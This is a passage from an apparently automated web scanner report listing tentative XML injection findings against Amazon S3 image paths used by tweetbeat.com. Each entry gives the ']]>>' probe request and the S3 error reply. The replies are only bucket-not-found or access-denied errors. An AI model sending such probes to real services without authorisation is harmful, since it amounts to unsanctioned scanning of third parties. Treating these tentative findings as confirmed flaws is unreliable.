The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/large/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 4228C9357A558888
x-amz-id-2: JCH0fGtvRla49Kq2VtiRDm6/OyuXc4rmo4QcwSa/0Zm4Vf3eySmGFAeJdEVMtGra
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:42 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>4228C9357
...[SNIP]...

8.6. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large]]>>/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1E6F8A0D2280EA32
x-amz-id-2: ujDVZZQnMTWRP7BNI/bbUDkqNVNpaW2+YNM4pcsZtITzJtvDyQFDkyJOhz6CH8g6
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:45 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1E6F8A0D2280EA32</RequestId><HostId>ujDVZZQnMTWRP7BNI/bbUDkqNVNpaW2+YNM4pcsZtITzJtvDyQ
...[SNIP]...

8.7. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large/17612]]>>/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4FB0ECE77A79C3E0
x-amz-id-2: Udld5xL7HtBzmXfSC2vPjcVJdfiy+l3wlLyu2WMFwYlf7kAzmR8NmBrLubf3Eu3D
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:45 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4FB0ECE77A79C3E0</RequestId><HostId>Udld5xL7HtBzmXfSC2vPjcVJdfiy+l3wlLyu2WMFwYlf7kAzmR
...[SNIP]...

8.8. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg]]>>?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: DEC0DCC9F260139A
x-amz-id-2: L5DttuYzt11LNyXoiHXnhTpgRKUu+xnuHowJNhZE0iDDrp2t6Xnwl+DVcIC1AOr7
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:46 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DEC0DCC9F260139A</RequestId><HostId>L5DttuYzt11LNyXoiHXnhTpgRKUu+xnuHowJNhZE0iDDrp2t6X
...[SNIP]...

8.9. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17566/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: BFFFECB988CB253A
x-amz-id-2: WCJCi6X8Jzuv6oGkOnzjeiu0WF+rxwEyVpTvCfHbwsYrkvM+SxutDvtccrEJIjZK
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>BFFFECB98
...[SNIP]...

8.10. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17566/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 7415FE7BA57796AF
x-amz-id-2: vNdLtsrA6hZ/9fgALoLgejuQHYFSW9DrscHUwO2wPu5BJlANln65K9wsYt9mJARH
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:16 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7415FE7BA57796AF</RequestId><HostId>vNdLtsrA6hZ/9fgALoLgejuQHYFSW9DrscHUwO2wPu5BJlANln
...[SNIP]...

8.11. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17566]]>>/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2EBAE47D8358A34D
x-amz-id-2: QtxetDMQSEMeysed6Qo4enm1QtvzLwKuC6CAAEKlp/+vds40kzXeThrTSxVU0gZD
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:17 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2EBAE47D8358A34D</RequestId><HostId>QtxetDMQSEMeysed6Qo4enm1QtvzLwKuC6CAAEKlp/+vds40kz
...[SNIP]...

8.12. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg]]>>?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2172B9808E49C2D5
x-amz-id-2: NzXJKjpep6Tz288hgIRbDTiiqWo+z4YSCojxFtIndnJ3//C6TnGeZ3arrUO3wmnM
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2172B9808E49C2D5</RequestId><HostId>NzXJKjpep6Tz288hgIRbDTiiqWo+z4YSCojxFtIndnJ3//C6Tn
...[SNIP]...

8.13. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17596/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 839012FE87B7D236
x-amz-id-2: CGUkptQjGdWA2Ryw4cyfz8+NL8vNokPoJRWfs+mLVlitf3a0K0nQh4Q+6cGrlFYK
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:16 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>839012FE8
...[SNIP]...

8.14. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17596/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 43E6329245F2E4F1
x-amz-id-2: FDIyUm57jXr3TiFQj6FPYk1rFw0La8q9VgmZFD3CN192bRYogHydt1IcDx/Kvgvt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>43E6329245F2E4F1</RequestId><HostId>FDIyUm57jXr3TiFQj6FPYk1rFw0La8q9VgmZFD3CN192bRYogH
...[SNIP]...

8.15. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17596]]>>/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 6741C186FFF1DE8B
x-amz-id-2: HgnarDDgIGiPNYYc5J4lMjALLXvr+4nNG6aBSiKinU4TZFJ/+okYbUq3D3Cw4yUI
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:20 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6741C186FFF1DE8B</RequestId><HostId>HgnarDDgIGiPNYYc5J4lMjALLXvr+4nNG6aBSiKinU4TZFJ/+o
...[SNIP]...

8.16. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg]]>>?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2E86CE60C768A1DB
x-amz-id-2: BnOa7WLJcK7v/5E53tIg+GoqfQ9uW2x84Oj/OYXkhzzW6BycxjzePnN3uNmU03eP
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:21 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2E86CE60C768A1DB</RequestId><HostId>BnOa7WLJcK7v/5E53tIg+GoqfQ9uW2x84Oj/OYXkhzzW6Bycxj
...[SNIP]...

8.17. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17602/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: E8D89C698C9A99C4
x-amz-id-2: 2lNgO+/++WqFDtvlI6SLwMlcnINOf8r0hGSW0KqvCav9jmkl8V1Fz2MepgKMZov2
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>E8D89C698
...[SNIP]...

8.18. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17602/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4FC3107BA42A1A08
x-amz-id-2: 2KkCiEtYOXcet4WRR5ljcig4e3srx2SFP8sqS/bqtERE4i2Xpv24H2DQyqBDttDv
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4FC3107BA42A1A08</RequestId><HostId>2KkCiEtYOXcet4WRR5ljcig4e3srx2SFP8sqS/bqtERE4i2Xpv
...[SNIP]...

8.19. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17602]]>>/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F362C11D96462588
x-amz-id-2: lgHzesIAbGbrJbIpHZoM44KVz3PSwdx8UGLee2QMR82/nVAPUWfETC6rcvuwg/dB
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F362C11D96462588</RequestId><HostId>lgHzesIAbGbrJbIpHZoM44KVz3PSwdx8UGLee2QMR82/nVAPUW
...[SNIP]...

8.20. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg]]>>?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F6E689F0DA079AE5
x-amz-id-2: S41gItFsxkwQcfWzXzCLvKI00VuxuFB7E/kXIBCNRswPEQdqdsvNwvJULL7OYGtr
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F6E689F0DA079AE5</RequestId><HostId>S41gItFsxkwQcfWzXzCLvKI00VuxuFB7E/kXIBCNRswPEQdqds
...[SNIP]...

8.21. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17605/phils%20victorino.jpg?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: E7EF3E9980C222AF
x-amz-id-2: BjDw1WTZ9KH6SWCqswHvEiCmplCqtColCpbIsZDiPXGngomJe5pAUZnDBcPucCki
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:01 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>E7EF3E998
...[SNIP]...

8.22. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17605/phils%20victorino.jpg?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: C45C394415BD7187
x-amz-id-2: 8xz29IkgXgiD5k/Yx7nTq7nJQZ08a5IqwBRkW5Tz4HrdsmgZKxmmeRwZRJyDEMEy
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:03 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C45C394415BD7187</RequestId><HostId>8xz29IkgXgiD5k/Yx7nTq7nJQZ08a5IqwBRkW5Tz4HrdsmgZKx
...[SNIP]...

8.23. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17605]]>>/phils%20victorino.jpg?1305320043 HTTP/1.1
